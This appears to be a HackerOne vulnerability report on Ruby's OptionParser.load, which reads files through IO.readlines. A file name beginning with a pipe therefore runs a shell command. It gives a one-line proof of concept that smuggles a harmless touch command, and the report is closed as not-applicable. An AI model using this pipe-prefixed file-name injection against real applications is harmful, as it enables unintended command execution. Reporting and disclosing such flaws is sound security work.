Command injection in OptionParser.load
Low
Vulnerability Details
OptionParser.load function use IO.readlines to read file, which can inject `| command ` to exec command.
poc:
```
require 'optparse'
OptionParser.new do |opts|
opts.load("|touch /tmp/niubl")
end.parse!
```
## Impact
The command may be executed unintentionally.
Actions
View on HackerOneReport Stats
- Report ID: 1090678
- State: Closed
- Substate: not-applicable
- Upvotes: 1